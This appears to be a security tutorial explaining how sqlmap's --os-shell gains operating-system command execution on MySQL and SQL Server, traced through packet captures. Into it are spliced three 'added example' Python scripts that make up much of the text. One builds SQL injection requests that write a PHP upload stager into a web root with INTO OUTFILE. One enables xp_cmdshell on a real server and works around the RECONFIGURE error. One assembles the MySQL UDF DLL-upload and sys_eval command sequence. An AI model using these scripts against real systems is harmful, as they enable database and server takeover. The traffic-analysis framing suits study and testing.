Preface
When the database is MySQL, PostgreSQL, or Microsoft SQL Server, and the current user possesses the privileges required to invoke specific functions, sqlmap can be used to obtain an operating system shell.
In the case of MySQL and PostgreSQL, sqlmap uploads a binary library containing user-defined functions, sys_exec() and sys_eval(). These two functions, once created, are capable of executing system commands.
For Microsoft SQL Server, sqlmap employs the xp_cmdshell stored procedure. If this procedure is disabled (it is disabled by default in Microsoft SQL Server 2005 and later), sqlmap will attempt to re‑enable it; if it does not exist, sqlmap will create it automatically.
The following sections illustrate the principles behind the --os-shell feature by examining injection scenarios and direct database connections for SQL Server and MySQL.
Injection-Based --os-shell
Prerequisites:
- Write access to the web server’s document root.
- The secure_file_priv variable is either empty or set to a writable path.
During a standard SQL injection, --os-shell works by first writing a sqlmap-supplied stager (referred to here as the trojan) into the document root and then using that stager to upload the shell that actually executes commands.
Test Environment
- Operating system: Microsoft Windows Server 2012 Standard
- Database: MySQL 5.1.60
- Scripting language: PHP 5.4.45
- Web server: Apache 2.4.39
Initially, sqlmap is employed to detect the injection point.
The --os-shell flag is then invoked.
At this stage, sqlmap performs three key actions:
- Probes the target to gather basic information.
- Uploads a shell to the target web server.
- Removes the shell upon exiting.
A packet capture with Wireshark, filtered to display only HTTP traffic, reveals the sequence.
Step 1 – sqlmap uploads a trojan that provides file‑upload functionality.
Following the HTTP stream reveals URL‑encoded content. Once decoded, it is apparent that the file is written to disk using INTO OUTFILE. The trojan’s code is hex‑encoded; decoding it exposes an upload‑capable script.
Step 2 – The uploaded trojan is used to transfer the actual shell.
Tracking the HTTP stream shows the shell’s source code in the request body.
Step 3 – Commands are passed to the shell for execution.
Step 4 – The shell is deleted.
A command is issued to remove the shell file.
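The four steps above, as an added example that is not part of the original post and not sqlmap's own code: the script rebuilds the kind of request sqlmap sends in Step 1 (a UNION injection that writes the upload-capable stager with INTO OUTFILE) and then decodes such a request the way the Wireshark analysis does, recovering the target path and the hex-encoded file body. The stager source, URL, parameter name, column count and output path are all constructed for illustration; sqlmap's real stager and temporary file names differ.

```python
"""Added example, not part of the original post or of sqlmap itself.

Rebuilds a Step-1 style INTO OUTFILE injection request and decodes a
captured one.  Stager source, URL, parameter, column count and path are
constructed placeholders.
"""
import re
import urllib.parse

# Constructed stand-in for the upload-capable stager; not sqlmap's code.
STAGER_PHP = (
    '<?php if (isset($_FILES["f"])) { '
    'move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"]); } ?>'
)


def build_outfile_payload(php_source: str, dest_path: str, columns: int = 3) -> str:
    """Injected value: UNION SELECT with the file body as a MySQL hex literal
    in the first column, padded with NULLs, written out with INTO OUTFILE.
    The hex literal is why no quotes or PHP tags appear in the clear."""
    hex_body = "0x" + php_source.encode().hex()
    cols = ",".join([hex_body] + ["NULL"] * (columns - 1))
    # Forward slashes avoid backslash escaping inside the MySQL string
    # literal, and Windows accepts them in paths.
    path = dest_path.replace("\\", "/")
    return f"-1 UNION ALL SELECT {cols} INTO OUTFILE '{path}'-- -"


def build_request_line(base: str, param: str, payload: str) -> str:
    """URL-encode the payload into a GET request line as a capture would show it."""
    return f"GET {base}?{urllib.parse.urlencode({param: payload})} HTTP/1.1"


def decode_outfile_request(request_line: str):
    """Recover the target path and the written file body from a captured
    request: URL-decode the query string, locate the INTO OUTFILE clause,
    then hex-decode the body (the manual steps described in the text)."""
    query = request_line.split(" ", 2)[1].split("?", 1)[1]
    params = urllib.parse.parse_qs(query)
    injected = next(v[0] for v in params.values() if "INTO OUTFILE" in v[0].upper())
    path = re.search(r"INTO\s+OUTFILE\s+'([^']+)'", injected, re.I).group(1)
    hex_literal = re.search(r"0x([0-9a-fA-F]+)", injected).group(1)
    return path, bytes.fromhex(hex_literal).decode("latin-1")


if __name__ == "__main__":
    payload = build_outfile_payload(STAGER_PHP, "C:\\xampp\\htdocs\\tmpstager.php")
    request = build_request_line("/vuln.php", "id", payload)
    print(request)
    path, body = decode_outfile_request(request)
    print(path)
    print(body)
```

Running the script prints the URL-encoded request first, which is what the capture shows, and then the decoded path and stager source, which is what the analysis step recovers. Point decode_outfile_request at a real request line copied from Wireshark to do the same for a live capture.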
Database‑Based --os-shell
When the database permits external connections, sqlmap can obtain a shell directly via the --os-shell flag.
Microsoft SQL Server
Prerequisites:
- The database server accepts external connections.
- The current login is a member of the sysadmin fixed server role (the privilege level of the built-in sa account).
With SQL Server, --os-shell relies on the xp_cmdshell extended stored procedure to execute operating system commands.
Test Environment
- Operating system: Microsoft Windows Server 2016 Datacenter
- Database: Microsoft SQL Server 2008
Sqlmap is used to connect to the database.
sqlmap -d "mssql://user:password@ip:port/dbname"
Sqlmap does not ship with the pymssql module; it must be installed manually.
After executing python -m pip install pymssql, the connection is established successfully.
The --os-shell command is then issued.
At this point, sqlmap performs three key actions:
- Identifies the database type and displays it.
- Checks whether the current user is a database administrator (i.e., verifies sysadmin/sa privileges).
- Determines whether xp_cmdshell is enabled; if it is not, sqlmap attempts to enable it.
In this instance, sqlmap was unable to activate xp_cmdshell automatically.
Consequently, --sql-shell was used to enable it manually:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
When RECONFIGURE; was executed, sqlmap reported a syntax error.
A Python script calling the pymssql module was written to isolate the issue.
The SELECT @@version; command could be executed successfully.
The error produced when executing RECONFIGURE; matched the error observed in --sql-shell.
Because the same error reproduced in a plain pymssql script, and sqlmap relies on pymssql for its direct connections, xp_cmdshell had to be enabled with a different client. Navicat was employed for this purpose.
The commands to enable xp_cmdshell were then executed.
Once enabled, commands could be issued either through Navicat or by using sqlmap’s --os-shell.
If a tool such as Navicat is used for the initial connection, one must manually verify whether the user is a database administrator and whether xp_cmdshell is present.
SELECT IS_SRVROLEMEMBER('sysadmin')
This returns 1 if the current login is a member of the sysadmin fixed server role, the role that sa belongs to.
SELECT COUNT(*) FROM master.dbo.sysobjects WHERE xtype='x' AND name='xp_cmdshell';
A result of 1 indicates that the xp_cmdshell extended stored procedure is registered (xtype 'X' denotes extended stored procedures).
After these checks, the process follows the same pattern described above.
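The checks and the enable sequence above, as an added example that is not part of the original post and not sqlmap's code: a small Python DB-API routine that verifies sysadmin membership and xp_cmdshell registration, then runs the sp_configure/RECONFIGURE sequence. One cause worth eliminating when RECONFIGURE fails from a driver is that RECONFIGURE is refused inside a user transaction (SQL Server error 574), and pymssql starts one implicitly unless autocommit is switched on; the routine therefore enables autocommit first. The query against sys.configurations, the FakeConnection stand-in and the command-line placeholders are mine, not the page's.

```python
"""Added example, not part of the original post or of sqlmap itself.

Pre-flight checks and the xp_cmdshell enable sequence over the Python
DB-API.  FakeConnection is a constructed stand-in for a SQL Server so the
logic runs offline; pass host user password database on the command line
to run against a real instance with pymssql.
"""

SYSADMIN_CHECK = "SELECT IS_SRVROLEMEMBER('sysadmin')"
XP_CMDSHELL_EXISTS = ("SELECT COUNT(*) FROM master.dbo.sysobjects "
                      "WHERE xtype='X' AND name='xp_cmdshell'")
# sys.configurations (SQL Server 2005+) exposes the running value of the option.
XP_CMDSHELL_ENABLED = ("SELECT CAST(value_in_use AS int) FROM sys.configurations "
                       "WHERE name='xp_cmdshell'")
ENABLE_SEQUENCE = (
    "EXEC sp_configure 'show advanced options', 1",
    "RECONFIGURE",
    "EXEC sp_configure 'xp_cmdshell', 1",
    "RECONFIGURE",
)


def scalar(cur, sql):
    """Run a single-value query and return the first column of the first row."""
    cur.execute(sql)
    row = cur.fetchone()
    return row[0] if row else None


def ensure_xp_cmdshell(conn) -> dict:
    """Check sysadmin membership and xp_cmdshell registration, then enable it.
    RECONFIGURE is refused inside a user transaction (error 574) and DB-API
    drivers such as pymssql open one implicitly, hence autocommit(True)."""
    cur = conn.cursor()
    state = {
        "sysadmin": scalar(cur, SYSADMIN_CHECK) == 1,
        "exists": scalar(cur, XP_CMDSHELL_EXISTS) == 1,
    }
    if not state["sysadmin"]:
        raise PermissionError("login is not in sysadmin; sp_configure will be denied")
    if not state["exists"]:
        raise RuntimeError("xp_cmdshell is not registered; it must be re-created first")
    state["enabled_before"] = scalar(cur, XP_CMDSHELL_ENABLED) == 1
    if not state["enabled_before"]:
        conn.autocommit(True)
        for stmt in ENABLE_SEQUENCE:
            cur.execute(stmt)
    state["enabled_after"] = scalar(cur, XP_CMDSHELL_ENABLED) == 1
    return state


class FakeConnection:
    """Constructed stand-in for a server: answers the queries above from a
    dict and applies sp_configure changes only when RECONFIGURE runs."""
    def __init__(self, sysadmin=1, exists=1, enabled=0):
        self.state = {"sysadmin": sysadmin, "exists": exists, "enabled": enabled}
        self.pending = None
        self.in_autocommit = False
        self.executed = []

    def autocommit(self, on):
        self.in_autocommit = on

    def cursor(self):
        return FakeCursor(self)


class FakeCursor:
    def __init__(self, conn):
        self.conn, self.row = conn, None

    def execute(self, sql):
        c, s = self.conn, self.conn.state
        c.executed.append(sql)
        self.row = None
        if sql == SYSADMIN_CHECK:
            self.row = (s["sysadmin"],)
        elif sql == XP_CMDSHELL_EXISTS:
            self.row = (s["exists"],)
        elif sql == XP_CMDSHELL_ENABLED:
            self.row = (s["enabled"],)
        elif sql == "EXEC sp_configure 'xp_cmdshell', 1":
            c.pending = 1
        elif sql == "RECONFIGURE":
            if not c.in_autocommit:  # mimics error 574 under an implicit transaction
                raise RuntimeError("574: RECONFIGURE statement cannot be used inside a user transaction")
            if c.pending is not None:
                s["enabled"], c.pending = c.pending, None

    def fetchone(self):
        return self.row


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 5:  # placeholders: host user password database
        import pymssql
        conn = pymssql.connect(server=sys.argv[1], user=sys.argv[2],
                               password=sys.argv[3], database=sys.argv[4])
    else:
        conn = FakeConnection()
    print(ensure_xp_cmdshell(conn))
```

Without arguments the script runs against the stand-in and shows the state before and after enabling; with a real server the same function reports whether the login is sysadmin, whether xp_cmdshell is registered, and whether the enable sequence took effect, which is exactly what has to be verified manually when a client other than sqlmap is used for the connection.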
A Wireshark capture of the TCP stream reveals the data sent.
The code was copied to a text file and certain characters were replaced.
Before executing the user‑supplied command, sqlmap runs ping -n 10 127.0.0.1 and echo 1 (marked as ① and ② in the figure); the ping introduces a measurable delay, which serves as a check that xp_cmdshell really executes commands. The commands that follow (③ onwards) are hex‑encoded.
MySQL
Prerequisites:
- The database server permits external connections.
- The secure_file_priv variable is either empty or set to a writable path.
- Write access to the MySQL installation directory is available.
- For MySQL 5.1 and later, the lib/plugin directory (the server's plugin_dir) must exist.
The MySQL --os-shell method leverages user‑defined functions (UDFs) to execute commands. This topic is covered in greater detail in the article MySQL UDF Privilege Escalation.
Test Environment
- Operating system: Microsoft Windows Server 2012 Standard
- Database: MySQL 5.1.60
Sqlmap is used to connect to the database.
As with pymssql, the pymysql module is not bundled and must be installed first; after installing it, a second connection attempt succeeds and sqlmap displays the approximate database version.
The --os-shell flag is then issued.
At this point, sqlmap performs five key actions:
- Connects to the MySQL database and retrieves its version.
- Verifies whether the current user is a database administrator.
- Checks if the sys_exec and sys_eval functions have already been created.
- Uploads the appropriate DLL file to the target directory.
- When the user exits, removes the sys_exec and sys_eval functions (by default).
A Wireshark TCP stream capture is analysed; the accompanying figure illustrates the process in detail.
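The five actions above, as an added example that is not sqlmap's code: the SQL statements behind --os-shell on a direct MySQL connection, assembled in Python so each step can be inspected before anything is sent and compared against what a capture shows. The DLL bytes, plugin_dir, file name and command are constructed placeholders; a real run needs the lib_mysqludf_sys library built for the server's architecture, and secure_file_priv must permit writing into the plugin directory. The "existing" argument is meant to receive the rows returned by the mysql.func query.

```python
"""Added example, not sqlmap's code: the SQL sequence behind --os-shell on a
direct MySQL connection.  DLL bytes, plugin_dir, file name and command are
constructed placeholders.
"""

# Return types as declared by lib_mysqludf_sys: sys_exec yields the exit
# status, sys_eval yields the command's standard output.
UDF_FUNCS = {"sys_exec": "INTEGER", "sys_eval": "STRING"}

PLUGIN_DIR_SQL = "SELECT @@plugin_dir"  # where MySQL 5.1+ loads UDF libraries from
EXISTING_UDF_SQL = "SELECT name FROM mysql.func WHERE name IN ({})".format(
    ",".join(f"'{n}'" for n in UDF_FUNCS))  # the "already created?" check


def mysql_path(plugin_dir: str, filename: str) -> str:
    """Join a Windows or Unix plugin_dir with the library name, using forward
    slashes so the MySQL string literal needs no backslash escaping."""
    return plugin_dir.replace("\\", "/").rstrip("/") + "/" + filename


def write_library_sql(dll_bytes: bytes, plugin_dir: str, filename: str) -> str:
    """INTO DUMPFILE writes the raw bytes unmodified (OUTFILE would add row
    formatting and escaping); the body travels as a hex literal."""
    if not dll_bytes:
        raise ValueError("empty library")
    return f"SELECT 0x{dll_bytes.hex()} INTO DUMPFILE '{mysql_path(plugin_dir, filename)}'"


def create_udf_sql(filename: str) -> list:
    """Register both UDFs from the library just written into plugin_dir."""
    return [f"CREATE FUNCTION {n} RETURNS {t} SONAME '{filename}'" for n, t in UDF_FUNCS.items()]


def exec_command_sql(cmd: str) -> str:
    """Run a command through sys_eval; the command is hex-encoded, as the
    commands in the capture are."""
    return f"SELECT sys_eval(0x{cmd.encode().hex()})"


def drop_udf_sql() -> list:
    """The cleanup sqlmap performs on exit by default."""
    return [f"DROP FUNCTION {n}" for n in UDF_FUNCS]


def plan_os_shell(dll_bytes, plugin_dir, filename, cmd, existing=()):
    """Order the statements as the text describes: the upload and CREATE
    FUNCTION steps are skipped when both UDFs are already registered."""
    steps = []
    if not set(UDF_FUNCS) <= set(existing):
        steps.append(write_library_sql(dll_bytes, plugin_dir, filename))
        steps += create_udf_sql(filename)
    steps.append(exec_command_sql(cmd))
    steps += drop_udf_sql()
    return steps


if __name__ == "__main__":
    fake_dll = b"MZ\x90\x00 constructed placeholder, not a real library"
    # plugin_dir as SELECT @@plugin_dir might return it on the Windows test host
    for stmt in plan_os_shell(fake_dll, "C:\\MySQL\\lib\\plugin\\", "lib_mysqludf_sys.dll", "whoami"):
        print(stmt[:96] + ("..." if len(stmt) > 96 else ""))
```

The printed sequence is what to expect in the TCP stream: one long SELECT ... INTO DUMPFILE carrying the library, two CREATE FUNCTION statements, the hex-encoded command through sys_eval, and the DROP FUNCTION cleanup on exit.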